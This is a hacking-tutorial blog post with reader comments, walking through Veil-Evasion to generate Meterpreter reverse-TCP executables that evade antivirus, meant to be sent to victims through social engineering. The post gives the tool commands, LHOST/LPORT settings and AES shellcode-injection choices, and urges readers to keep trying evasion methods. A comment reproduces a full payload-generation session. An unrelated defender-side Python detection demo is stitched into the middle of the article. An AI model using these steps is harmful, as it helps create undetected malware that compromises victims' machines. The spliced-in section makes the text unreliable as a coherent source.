Hack Like a Pro: How to Evade AV Detection with Veil-Evasion

Welcome back, my greenhorn hackers!

One of the most important issues any hacker must address is how to get past security devices and remain undetected. These can include antivirus software, intrusion detection systems, firewalls, web application firewalls, and numerous others. As nearly all of these devices employ a signature-based detection scheme where they maintain a database of known exploits and payload signatures, the key is to either:

  1. create your own exploit, or
  2. change the signature of a known exploit or payload.

As creating your own exploit and payload is both time-consuming and requires advanced skills, the novice hacker is better served by first attempting to change the signature of the exploit and payload.

In previous tutorials, we have used both Metasploit's msfpayload/msfencode (now deprecated) and msfvenom. In those cases, the AV developers have written signatures for the templates those tools use. In this tutorial, we will look at another re-encoding scheme for hiding the signature of known payloads, Veil-Evasion.

Veil-Evasion was specifically developed to enable you to change the signature of your payload. It is written in Python, but has numerous encoders to enable you to rewrite your code to evade detection in multiple ways.

Step 1: Install Veil-Evasion

We first need to install Veil-Evasion on our system. We can download it from the Kali repository. Simply type:

kali > apt-get install veil-evasion

Step 2: Set Up Veil-Evasion

To start Veil-Evasion, just type:

kali > veil-evasion

When you do so, you will be greeted with this opening screen:

Veil will now begin its installation. It will ask you whether you want to install dependencies; tell it "y" for yes. Next, Veil-Evasion will begin to download all its dependencies. This can take a while, so be patient. Eventually, Veil-Evasion will ask you whether you want to install Python for Windows. Select "Install for all users" and click the "Next" button.

Use the default directory when the install wizard asks, and then you will be greeted by a screen like below. Click "Next."

Eventually, you will come to a screen like that below. Go ahead and click "Next" again.

Continue to click "Next" through several screens until you finally come to a window with the "Finish" button. Click it. Eventually, your patience will be rewarded when you finally arrive at the screen below. Now we are ready to begin to use Veil-Evasion to create a nearly undetectable payload.

Step 3: Create an EXE with a Payload

In this first step, we will create a simple .exe file containing a payload that enables us to own the victim's system. The file would be sent to the victim, who then has to click on it to execute it; generally, this type of attack is part of a social engineering attack.

Let's now type "list" as this will list all of the payloads that Veil-Evasion can work with.

Those of you who are familiar with Metasploit will recognize many of these payloads.

Step 4: Use a Payload

In this case, let's use the ruby/meterpreter/rev_tcp, or number 44. Let's type:

> use 44

When we do so, Veil-Evasion will come back with a screen like below asking us to set the options.

We will need to set LHOST and LPORT.

> set LHOST 192.168.1.101
> set LPORT 6996

Of course, use the appropriate IP address and port for your circumstances.

Next, we need to tell Veil-Evasion to generate the executable.

> generate

As you can see in the screenshot above, Veil-Evasion has generated a new .exe file that I have named "newpayload.exe" (you can name it whatever you please).

Step 5: Generate an Encrypted Payload to Evade Detection

Next, let's attempt to create an encrypted payload that can get past AV software and other security devices. In this case, we will use a different entry from the payload list, namely python/shellcode_inject/aes_encrypt. This payload type uses VirtualAlloc injection, which creates an executable area in memory for the shellcode and then locks that memory area in physical memory.

This is number 32 on our payload list, so type:

> info 32

It then returns info on this payload as seen below.

This payload uses VirtualAlloc injection in conjunction with AES encryption (AES is the Advanced Encryption Standard, generally regarded as among the strongest encryption available) to obfuscate its true nature from AV software and other security devices.

Next, let's tell Veil-Evasion we want to use this payload.

> use 32

Here we have the option to change the default options if we care to do so. For now, let's leave the default options as they are.

Next, let's tell Veil-Evasion we want to generate this encrypted payload.

> generate

When we do so, it will use the default payload windows/meterpreter/reverse_tcp and then prompt us for the LHOST and LPORT. When we finish entering the appropriate information for our payload, it will begin to generate the shellcode. This can take a few minutes, so be patient.

Next, Veil-Evasion will prompt us for what we want to name our payload. You can use whatever name your heart desires, but I used the simple "veilpayload."

Finally, Veil-Evasion will complete its work and present us with the finished product, as we see below.

This new code with the meterpreter embedded within will get past most AV software and security devices. Like anything else, the AV developers will likely find a way to detect even this payload, so be creative and try other payload obfuscation methods in Veil-Evasion until you find one that hides your payload.
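To make the introduction's point about signature-based detection concrete from the defender's side, and to show why the warning in this paragraph holds (a vendor can still key on the loader template rather than on the encrypted body), here is an added Python example. It is not part of the original tutorial and is not Veil-Evasion's code. Everything in it is constructed: the fake executable header, the "known stager" bytes and the toy signature for them, a seeded pseudorandom blob standing in for an AES-encrypted shellcode body, and the assumption that an injector using VirtualAlloc injection references VirtualAlloc, RtlMoveMemory and CreateThread by name somewhere in the file.

```python
"""
Added illustration (not Veil-Evasion code): why a byte-signature scanner loses
a re-encoded payload, and what a defender can still key on. Every input below
is constructed in this file; nothing is real malware or a real AV signature.
"""
import math
import random
from collections import Counter

# --- constructed inputs -------------------------------------------------------

# Placeholder for an executable header; low-entropy filler, not a valid PE.
FAKE_HEADER = b"MZ" + b"\x00" * 126 + b"This program cannot be run in DOS mode.\r\n"

# Stand-in for a known stager body that a vendor has already fingerprinted.
KNOWN_PAYLOAD = b"CONSTRUCTED-STAGER-BODY:" + b"\x90" * 64 + b"connect-back-loop"

# Toy signature database: name -> byte pattern (constructed, not a vendor's).
SIGNATURE_DB = {
    "constructed/known-stager": b"CONSTRUCTED-STAGER-BODY",
}

# Assumption: an injector that uses VirtualAlloc injection references these
# Win32 API names somewhere in the executable (import table or strings).
LOADER_APIS = [b"VirtualAlloc", b"RtlMoveMemory", b"CreateThread"]


def pseudo_random_blob(seed: int, size: int) -> bytes:
    """Deterministic high-entropy bytes standing in for an encrypted body."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(size))


# Sample 1: the plain payload embedded as-is; the known bytes are present,
# so the signature fires.
PLAIN_SAMPLE = FAKE_HEADER + KNOWN_PAYLOAD

# Sample 2: loader strings plus an opaque body standing in for the encrypted
# shellcode; the known bytes are gone, so the signature cannot fire.
ENCRYPTED_SAMPLE = (FAKE_HEADER + b"\x00".join(LOADER_APIS) + b"\x00"
                    + pseudo_random_blob(1, 1024))

# Sample 3: a benign high-entropy blob (think of a zip attachment), to show
# that entropy alone is not a verdict.
BENIGN_ARCHIVE = b"PK\x03\x04" + pseudo_random_blob(2, 1024)

# --- detection primitives -----------------------------------------------------

ENTROPY_THRESHOLD = 7.0   # bits per byte; random/encrypted data sits near 8
WINDOW, STEP = 512, 128


def signature_hits(data: bytes) -> list:
    """Names of database signatures whose byte pattern occurs in data."""
    return [name for name, pattern in SIGNATURE_DB.items() if pattern in data]


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty or constant input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def max_window_entropy(data: bytes) -> float:
    """Highest entropy over sliding windows, so a packed section is not
    averaged away by low-entropy headers and padding."""
    if len(data) <= WINDOW:
        return shannon_entropy(data)
    return max(shannon_entropy(data[i:i + WINDOW])
               for i in range(0, len(data) - WINDOW + 1, STEP))


def loader_api_strings(data: bytes) -> list:
    """Injection-related API names found as plain strings in data."""
    return [api.decode() for api in LOADER_APIS if api in data]


def classify(data: bytes) -> str:
    """Combine the three indicators into a coarse verdict."""
    if signature_hits(data):
        return "known-payload"
    packed = max_window_entropy(data) > ENTROPY_THRESHOLD
    if packed and loader_api_strings(data):
        return "suspicious-packed-loader"
    if packed:
        return "high-entropy-only"   # normal for archives, media, TLS blobs
    return "clean"


if __name__ == "__main__":
    for label, sample in [("plain", PLAIN_SAMPLE),
                          ("encrypted", ENCRYPTED_SAMPLE),
                          ("benign archive", BENIGN_ARCHIVE)]:
        print(f"{label:15} sigs={signature_hits(sample)} "
              f"entropy={max_window_entropy(sample):.2f} "
              f"apis={loader_api_strings(sample)} -> {classify(sample)}")
```

Run it and the plain sample is caught by the byte signature, the "encrypted" sample slips past that same signature but is flagged by the combination of a high-entropy section and the injection API names, and the benign archive shows why entropy on its own only earns a "look closer", not a verdict. Real products layer emulation and behavioural monitoring on top of static checks like these, which is the practical reason the tutorial's "AV developers will likely find a way" caveat keeps coming true.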

Evading security software and devices is among the most important tasks of the hacker, and Veil-Evasion is another tool in our arsenal. Keep in mind, though, that there is NEVER a single, final solution. The hacker must be persistent and creative in finding ways past these devices, so if one method fails, try another, then try another, until you find one that works.

49 Comments

I've had plenty of trouble installing Veil in the past. Plenty of times dependency trees fail because of some Capstone version issues and other times even after install Veil-Evasion.py won't run because of issues. So stressful lol

This may be a bit off-topic, but I was wondering if it is possible to make a meterpreter payload using Veil-Evasion that can be used in Metasploit modules as a custom payload. If so, how? (I have never used Veil-Evasion before.)

Even more off-topic: would it also be possible to make an encrypted tunnel to your meterpreter shell so an IDS can't detect it? (like cryptcat does)

-Phoenix750

Phoenix:

That is exactly what we did here in this tutorial. We created a custom payload for Metasploit. Am I missing something in your question?

OTW

Master OTW, what you did was create an EXE with an encrypted meterpreter payload in it. My question is how to use this payload in Metasploit modules, or can you just simply use the EXE file as a payload? (Yeah, I am kind of new to using encrypted payloads.)

Then my second question was that, using my logical thinking, our communications could still be detected by an IDS, so to solve this we would need to encrypt our connection (like Cryptcat does). The thing is, is this possible with meterpreter? I tried to google around but found nothing of interest.

Sorry if I was unclear.

-Phoenix750

Phoenix:

I am planning a new tutorial next week on how to add a custom payload to Metasploit.

OTW

Is it even possible to use Veil's hiding technique on other exploits? The social-engineering type EXE makes sense because it disguises the program from antivirus and is useful for disguising a program that the user needs to run, but for more active exploits is it even possible to use Veil's method?

Also, the default mode for meterpreter is encrypted communication back to the attacker.

Didn't even know that! Thanks, master OTW!

-Phoenix750

Note that this encryption only applies to the meterpreter, not other payloads necessarily.

How do I know which port I have to use?

Why does the Veil Dev team say not to use the apt-get install version, whereas they prefer cloning?

It's updated more frequently...? I don't know for sure, but the GitHub repo will be updated almost daily.

This was a clean install and apt-get update worked. Where on the Kali site does it show you the current main repositories?

http://docs.kali.org/general-use/kali-linux-sources-list-repositories
"Regular repositories
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

Source repositories

deb-src http://http.kali.org/kali kali main non-free contrib
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free

Bleeding Edge repositories

deb http://repo.kali.org/kali kali-bleeding-edge main
#deb-src http://repo.kali.org/kali kali-bleeding-edge main"

I pulled it from there.

Did you add the repositories and try again?

Yeah, it works now, thanks. So the standard repository links change when updated over time?

I don't know, it shouldn't too often.

How can I make my payload a .exe? As far as I see I can't change the extension to a Windows executable, and I'm quite certain that not many Windows target machines have Python installed. Otherwise I'll have to use catapult, right?

-Kradox

Kra Dox, if I'm not too late and you have not already figured this out, Veil-Evasion already outputs an exe file, with the default directory of /usr/share/veil-output/compiled.

-TheVillain

Hello Sir,

Need help again resolving this problem. I've run the AES Python encryption along with 20 iterations of shikata ga nai and converted it to an exe. However, when I run the exe on my PC, it misses my current user folder. As you can see, it's searching for the DLL in NVDPI_~1, but my real user folder is nvdpi_000, and I presume that's the reason why it can't load the DLL. This is a Windows 8 machine. Any tips on how to solve this? Thank you for your time!

Image via imgur.com

It's detected now! :( Another way ?

Is there any way to use Veil with Android payloads? For example, android/meterpreter/reverse_tcp.
Now mobiles also have AV applications!

I did everything. Managed to get through facebook AV and Avast. Executed the file on my virtual machine and... nothing happened ! I guess I got the LHOST wrong. I'm using Windows 7 in VirtualBox. I use a bridged network. The LHOST I've put was the "inet addr" I got after typing ifconfig in Linux.

What could be wrong ?

Have you set the payload's LHOST=PublicIP (you can google "public ip") and the listener's LHOST=Private/LocalIP (such as from ifconfig)?

Just a quick question please:

Will I be able to install an encrypted payload in Metasploit as a custom module? I see that it uses Python, when I believe all payloads in Metasploit use Ruby, right?

Hi OTW,

When trying to create a payload with Veil-Evasion I get these errors:

Images via postimg.org

Any help will be greatly appreciated.

It appears that your pyinstaller is missing or corrupted.

Try removing it and re-installing it.

I can't remove it. It says it is owned by the OS.

sudo apt-get install python.exe

That should do the trick.

I have installed Veil on Kali Linux. When I try to use it I face this error in its working process:

! ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/
! ERROR: Make sure the python.exe binary exists before using PyInstaller.
Please help me resolve this problem.

How do I upload the image... please?

When you click on reply, you will see a small icon in the reply window that looks like a picture frame with "attach" next to it.

I have taken the screenshot using scrot.

Can any of these payloads be used on an Android phone? I want to evade my own antivirus to try this out on my Android phone.

Can you please help me in getting this problem solved?
# veil-Evasion
# list
# use python/shellcode_inject/aes_encrypt
python/shellcode_inject/aes_encrypt>>: set USE_PYHERION Y
python/shellcode_inject/aes_encrypt>>:help
python/shellcode_inject/aes_encrypt>>: generate

? Use msfvenom or supply custom shellcode?

1 - msfvenom (default)
2 - custom shellcode string
3 - file with shellcode (raw)

> Please enter the number of your choice: 1

* Press enter for windows/meterpreter/reverse_tcp
* Press tab to list available payloads
> Please enter metasploit payload:

> Enter value for 'LHOST', tab for local IP: 192.168.0.6
> Enter value for 'LPORT': 4444
> Enter any extra msfvenom options (syntax: OPTION1=value1 OPTION2=value2):
* Generating shellcode...

> Please enter the base name for output files (default is 'payload'): tutorial

1 - Pyinstaller (default)
2 - Pwnstaller (obfuscated Pyinstaller loader)
3 - Py2Exe

> Please enter the number of your choice:1

! ERROR: Can't find python.exe in /root/.wine/drive_c/Python27/
! ERROR: Make sure the python.exe binary exists before using PyInstaller.

root@kali:~#
This is the problem. Can you please help me solve it?
I have installed Python in my Kali Linux, but python.exe does not
exist. Can you please help me solve this problem? Please.

Uhh...
Is it possible to encrypt an encrypted exe again using another method?
If yes, will that payload be able to connect to LHOST?

Hey, for some reason the first payload, which was not encrypted, gets past my McAfee antivirus, but the encrypted payload does not.

Don't know if you people will still reply to me, but I have a really big problem. When I was installing Veil-Evasion with "apt-get install veil-evasion" it succeeded, but I rebooted my virtual machine right after that, and then there comes a real problem: I literally can't boot. I don't know if it's a memory problem or something else; please reply to me ASAP. I tried setting my base memory to a higher value but it hasn't fixed the problem. Please HELP!
